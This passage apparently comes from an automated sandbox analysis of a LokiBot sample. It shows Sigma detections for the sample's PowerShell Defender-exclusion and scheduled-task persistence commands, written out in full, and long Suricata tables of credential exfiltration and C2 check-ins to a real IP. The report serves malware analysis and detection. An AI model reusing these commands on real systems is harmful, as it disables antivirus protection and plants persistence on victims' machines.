Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kzQ25HVUbf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kzQ25HVUbf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\kzQ25HVUbf.exe", ParentImage: C:\Users\user\Desktop\kzQ25HVUbf.exe, ParentProcessId: 7568, ParentProcessName: kzQ25HVUbf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kzQ25HVUbf.exe", ProcessId: 7812, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp851F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp851F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe, ParentImage: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe, ParentProcessId: 8176, ParentProcessName: iWEWjTXiqXke.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp851F.tmp", ProcessId: 7624, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp53FD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp53FD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\kzQ25HVUbf.exe", ParentImage: C:\Users\user\Desktop\kzQ25HVUbf.exe, ParentProcessId: 7568, ParentProcessName: kzQ25HVUbf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp53FD.tmp", ProcessId: 7924, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kzQ25HVUbf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kzQ25HVUbf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\kzQ25HVUbf.exe", ParentImage: C:\Users\user\Desktop\kzQ25HVUbf.exe, ParentProcessId: 7568, ParentProcessName: kzQ25HVUbf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kzQ25HVUbf.exe", ProcessId: 7812, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp53FD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp53FD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\kzQ25HVUbf.exe", ParentImage: C:\Users\user\Desktop\kzQ25HVUbf.exe, ParentProcessId: 7568, ParentProcessName: kzQ25HVUbf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp53FD.tmp", ProcessId: 7924, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:37:17.995289+0100	2024312	1	A Network Trojan was detected	192.168.2.9	49804	94.156.177.41	80	TCP
2025-01-11T08:37:19.336213+0100	2024312	1	A Network Trojan was detected	192.168.2.9	49811	94.156.177.41	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:37:17.283199+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49804	94.156.177.41	80	TCP
2025-01-11T08:37:18.596493+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49811	94.156.177.41	80	TCP
2025-01-11T08:37:19.430625+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49817	94.156.177.41	80	TCP
2025-01-11T08:37:20.295163+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49828	94.156.177.41	80	TCP
2025-01-11T08:37:21.333703+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49834	94.156.177.41	80	TCP
2025-01-11T08:37:22.217012+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49841	94.156.177.41	80	TCP
2025-01-11T08:37:23.102371+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49848	94.156.177.41	80	TCP
2025-01-11T08:37:24.122123+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49854	94.156.177.41	80	TCP
2025-01-11T08:37:25.027858+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49864	94.156.177.41	80	TCP
2025-01-11T08:37:25.900548+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49870	94.156.177.41	80	TCP
2025-01-11T08:37:26.766848+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49876	94.156.177.41	80	TCP
2025-01-11T08:37:27.644318+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49882	94.156.177.41	80	TCP
2025-01-11T08:37:28.555245+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49888	94.156.177.41	80	TCP
2025-01-11T08:37:29.427877+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49895	94.156.177.41	80	TCP
2025-01-11T08:37:30.321553+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49904	94.156.177.41	80	TCP
2025-01-11T08:37:31.243472+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49911	94.156.177.41	80	TCP
2025-01-11T08:37:32.132348+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49917	94.156.177.41	80	TCP
2025-01-11T08:37:33.035370+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49923	94.156.177.41	80	TCP
2025-01-11T08:37:33.901353+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49929	94.156.177.41	80	TCP
2025-01-11T08:37:34.780300+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49938	94.156.177.41	80	TCP
2025-01-11T08:37:35.656565+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49946	94.156.177.41	80	TCP
2025-01-11T08:37:36.542434+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49952	94.156.177.41	80	TCP
2025-01-11T08:37:37.413981+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49958	94.156.177.41	80	TCP
2025-01-11T08:37:38.278632+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49964	94.156.177.41	80	TCP
2025-01-11T08:37:39.298255+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49972	94.156.177.41	80	TCP
2025-01-11T08:37:40.160259+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49980	94.156.177.41	80	TCP
2025-01-11T08:37:41.027625+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49987	94.156.177.41	80	TCP
2025-01-11T08:37:41.877046+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49993	94.156.177.41	80	TCP
2025-01-11T08:37:42.766186+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	49999	94.156.177.41	80	TCP
2025-01-11T08:37:43.647766+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50006	94.156.177.41	80	TCP
2025-01-11T08:37:44.509809+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50009	94.156.177.41	80	TCP
2025-01-11T08:37:45.351886+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50010	94.156.177.41	80	TCP
2025-01-11T08:37:46.247938+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50011	94.156.177.41	80	TCP
2025-01-11T08:37:47.141186+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50012	94.156.177.41	80	TCP
2025-01-11T08:37:47.993044+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50013	94.156.177.41	80	TCP
2025-01-11T08:37:48.851758+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50014	94.156.177.41	80	TCP
2025-01-11T08:37:49.710358+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50015	94.156.177.41	80	TCP
2025-01-11T08:37:50.589002+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50016	94.156.177.41	80	TCP
2025-01-11T08:37:51.533742+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50017	94.156.177.41	80	TCP
2025-01-11T08:37:52.420648+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50018	94.156.177.41	80	TCP
2025-01-11T08:37:53.281289+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50019	94.156.177.41	80	TCP
2025-01-11T08:37:54.149795+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50020	94.156.177.41	80	TCP
2025-01-11T08:37:55.447402+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50021	94.156.177.41	80	TCP
2025-01-11T08:37:56.296589+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50022	94.156.177.41	80	TCP
2025-01-11T08:37:57.168024+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50023	94.156.177.41	80	TCP
2025-01-11T08:37:58.108290+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50024	94.156.177.41	80	TCP
2025-01-11T08:37:58.997732+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50025	94.156.177.41	80	TCP
2025-01-11T08:37:59.881352+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50027	94.156.177.41	80	TCP
2025-01-11T08:38:00.923865+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50028	94.156.177.41	80	TCP
2025-01-11T08:38:01.801642+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50029	94.156.177.41	80	TCP
2025-01-11T08:38:02.929554+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50030	94.156.177.41	80	TCP
2025-01-11T08:38:03.788440+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50031	94.156.177.41	80	TCP
2025-01-11T08:38:04.654751+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50032	94.156.177.41	80	TCP
2025-01-11T08:38:05.736766+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50033	94.156.177.41	80	TCP
2025-01-11T08:38:06.637553+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50034	94.156.177.41	80	TCP
2025-01-11T08:38:07.543493+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50035	94.156.177.41	80	TCP
2025-01-11T08:38:08.535138+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50036	94.156.177.41	80	TCP
2025-01-11T08:38:09.430836+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50037	94.156.177.41	80	TCP
2025-01-11T08:38:10.296978+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50038	94.156.177.41	80	TCP
2025-01-11T08:38:11.151744+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50039	94.156.177.41	80	TCP
2025-01-11T08:38:12.040089+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50040	94.156.177.41	80	TCP
2025-01-11T08:38:12.949663+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50041	94.156.177.41	80	TCP
2025-01-11T08:38:13.842179+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50042	94.156.177.41	80	TCP
2025-01-11T08:38:14.714006+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50043	94.156.177.41	80	TCP
2025-01-11T08:38:15.727832+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50044	94.156.177.41	80	TCP
2025-01-11T08:38:16.602139+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50045	94.156.177.41	80	TCP
2025-01-11T08:38:17.480431+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50046	94.156.177.41	80	TCP
2025-01-11T08:38:18.361971+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50047	94.156.177.41	80	TCP
2025-01-11T08:38:19.243600+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50048	94.156.177.41	80	TCP
2025-01-11T08:38:20.125882+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50049	94.156.177.41	80	TCP
2025-01-11T08:38:21.374944+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50050	94.156.177.41	80	TCP
2025-01-11T08:38:22.229791+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50051	94.156.177.41	80	TCP
2025-01-11T08:38:23.088593+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50052	94.156.177.41	80	TCP
2025-01-11T08:38:24.220880+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50053	94.156.177.41	80	TCP
2025-01-11T08:38:25.073323+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50054	94.156.177.41	80	TCP
2025-01-11T08:38:25.957719+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50055	94.156.177.41	80	TCP
2025-01-11T08:38:26.972510+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50056	94.156.177.41	80	TCP
2025-01-11T08:38:27.976208+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50057	94.156.177.41	80	TCP
2025-01-11T08:38:28.837379+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50058	94.156.177.41	80	TCP
2025-01-11T08:38:29.840822+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50059	94.156.177.41	80	TCP
2025-01-11T08:38:30.693073+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50060	94.156.177.41	80	TCP
2025-01-11T08:38:31.577126+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50061	94.156.177.41	80	TCP
2025-01-11T08:38:32.460501+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50062	94.156.177.41	80	TCP
2025-01-11T08:38:33.646503+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50063	94.156.177.41	80	TCP
2025-01-11T08:38:34.530472+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50064	94.156.177.41	80	TCP
2025-01-11T08:38:35.510279+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50065	94.156.177.41	80	TCP
2025-01-11T08:38:36.471295+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50066	94.156.177.41	80	TCP
2025-01-11T08:38:37.336378+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50067	94.156.177.41	80	TCP
2025-01-11T08:38:38.202393+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50068	94.156.177.41	80	TCP
2025-01-11T08:38:39.238877+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50069	94.156.177.41	80	TCP
2025-01-11T08:38:40.130128+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50070	94.156.177.41	80	TCP
2025-01-11T08:38:41.012348+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50071	94.156.177.41	80	TCP
2025-01-11T08:38:41.968094+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50072	94.156.177.41	80	TCP
2025-01-11T08:38:42.823353+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50073	94.156.177.41	80	TCP
2025-01-11T08:38:43.698121+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50074	94.156.177.41	80	TCP
2025-01-11T08:38:44.595801+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50075	94.156.177.41	80	TCP
2025-01-11T08:38:45.627870+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50076	94.156.177.41	80	TCP
2025-01-11T08:38:46.516711+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50077	94.156.177.41	80	TCP
2025-01-11T08:38:47.424671+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50078	94.156.177.41	80	TCP
2025-01-11T08:38:48.273476+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50079	94.156.177.41	80	TCP
2025-01-11T08:38:49.116902+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50080	94.156.177.41	80	TCP
2025-01-11T08:38:49.960016+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50081	94.156.177.41	80	TCP
2025-01-11T08:38:50.825321+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50082	94.156.177.41	80	TCP
2025-01-11T08:38:51.695758+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50083	94.156.177.41	80	TCP
2025-01-11T08:38:52.555444+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50084	94.156.177.41	80	TCP
2025-01-11T08:38:53.414347+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50085	94.156.177.41	80	TCP
2025-01-11T08:38:54.273813+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50086	94.156.177.41	80	TCP
2025-01-11T08:38:55.134435+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50087	94.156.177.41	80	TCP
2025-01-11T08:38:56.036472+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50088	94.156.177.41	80	TCP
2025-01-11T08:38:56.987645+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50089	94.156.177.41	80	TCP
2025-01-11T08:38:57.870196+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50090	94.156.177.41	80	TCP
2025-01-11T08:38:58.710492+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50091	94.156.177.41	80	TCP
2025-01-11T08:38:59.655514+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50092	94.156.177.41	80	TCP
2025-01-11T08:39:00.512250+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50093	94.156.177.41	80	TCP
2025-01-11T08:39:01.365444+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50094	94.156.177.41	80	TCP
2025-01-11T08:39:02.473916+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50095	94.156.177.41	80	TCP
2025-01-11T08:39:03.353242+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50096	94.156.177.41	80	TCP
2025-01-11T08:39:04.211638+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50097	94.156.177.41	80	TCP
2025-01-11T08:39:05.111899+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50098	94.156.177.41	80	TCP
2025-01-11T08:39:06.002182+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50099	94.156.177.41	80	TCP
2025-01-11T08:39:06.979552+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50100	94.156.177.41	80	TCP
2025-01-11T08:39:07.899333+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50101	94.156.177.41	80	TCP
2025-01-11T08:39:08.814632+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50102	94.156.177.41	80	TCP
2025-01-11T08:39:09.685224+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50103	94.156.177.41	80	TCP
2025-01-11T08:39:10.558443+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50104	94.156.177.41	80	TCP
2025-01-11T08:39:11.462948+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.9	50105	94.156.177.41	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:37:20.138790+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49817	94.156.177.41	80	TCP
2025-01-11T08:37:21.015453+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49828	94.156.177.41	80	TCP
2025-01-11T08:37:22.060608+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49834	94.156.177.41	80	TCP
2025-01-11T08:37:22.934799+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49841	94.156.177.41	80	TCP
2025-01-11T08:37:23.790840+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49848	94.156.177.41	80	TCP
2025-01-11T08:37:24.850077+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49854	94.156.177.41	80	TCP
2025-01-11T08:37:25.749213+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49864	94.156.177.41	80	TCP
2025-01-11T08:37:26.588548+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49870	94.156.177.41	80	TCP
2025-01-11T08:37:27.478445+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49876	94.156.177.41	80	TCP
2025-01-11T08:37:28.381899+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49882	94.156.177.41	80	TCP
2025-01-11T08:37:29.254495+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49888	94.156.177.41	80	TCP
2025-01-11T08:37:30.159633+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49895	94.156.177.41	80	TCP
2025-01-11T08:37:31.068873+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49904	94.156.177.41	80	TCP
2025-01-11T08:37:31.960696+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49911	94.156.177.41	80	TCP
2025-01-11T08:37:32.876960+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49917	94.156.177.41	80	TCP
2025-01-11T08:37:33.740539+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49923	94.156.177.41	80	TCP
2025-01-11T08:37:34.614693+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49929	94.156.177.41	80	TCP
2025-01-11T08:37:35.493079+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49938	94.156.177.41	80	TCP
2025-01-11T08:37:36.377601+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49946	94.156.177.41	80	TCP
2025-01-11T08:37:37.256341+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49952	94.156.177.41	80	TCP
2025-01-11T08:37:38.126336+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49958	94.156.177.41	80	TCP
2025-01-11T08:37:39.132869+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49964	94.156.177.41	80	TCP
2025-01-11T08:37:39.989261+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49972	94.156.177.41	80	TCP
2025-01-11T08:37:40.867627+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49980	94.156.177.41	80	TCP
2025-01-11T08:37:41.715847+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49987	94.156.177.41	80	TCP
2025-01-11T08:37:42.601897+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49993	94.156.177.41	80	TCP
2025-01-11T08:37:43.489590+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	49999	94.156.177.41	80	TCP
2025-01-11T08:37:44.355553+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50006	94.156.177.41	80	TCP
2025-01-11T08:37:45.204506+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50009	94.156.177.41	80	TCP
2025-01-11T08:37:46.087106+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50010	94.156.177.41	80	TCP
2025-01-11T08:37:46.977754+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50011	94.156.177.41	80	TCP
2025-01-11T08:37:47.837286+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50012	94.156.177.41	80	TCP
2025-01-11T08:37:48.699029+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50013	94.156.177.41	80	TCP
2025-01-11T08:37:49.557629+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50014	94.156.177.41	80	TCP
2025-01-11T08:37:50.432462+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50015	94.156.177.41	80	TCP
2025-01-11T08:37:51.359900+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50016	94.156.177.41	80	TCP
2025-01-11T08:37:52.255722+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50017	94.156.177.41	80	TCP
2025-01-11T08:37:53.124263+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50018	94.156.177.41	80	TCP
2025-01-11T08:37:54.003233+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50019	94.156.177.41	80	TCP
2025-01-11T08:37:54.850099+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50020	94.156.177.41	80	TCP
2025-01-11T08:37:56.132335+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50021	94.156.177.41	80	TCP
2025-01-11T08:37:57.013035+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50022	94.156.177.41	80	TCP
2025-01-11T08:37:57.903370+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50023	94.156.177.41	80	TCP
2025-01-11T08:37:58.830433+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50024	94.156.177.41	80	TCP
2025-01-11T08:37:59.712910+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50025	94.156.177.41	80	TCP
2025-01-11T08:38:00.754871+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50027	94.156.177.41	80	TCP
2025-01-11T08:38:01.623270+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50028	94.156.177.41	80	TCP
2025-01-11T08:38:02.493986+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50029	94.156.177.41	80	TCP
2025-01-11T08:38:03.624137+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50030	94.156.177.41	80	TCP
2025-01-11T08:38:04.490753+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50031	94.156.177.41	80	TCP
2025-01-11T08:38:05.395008+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50032	94.156.177.41	80	TCP
2025-01-11T08:38:06.454721+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50033	94.156.177.41	80	TCP
2025-01-11T08:38:07.370753+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50034	94.156.177.41	80	TCP
2025-01-11T08:38:08.253891+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50035	94.156.177.41	80	TCP
2025-01-11T08:38:09.255787+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50036	94.156.177.41	80	TCP
2025-01-11T08:38:10.138394+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50037	94.156.177.41	80	TCP
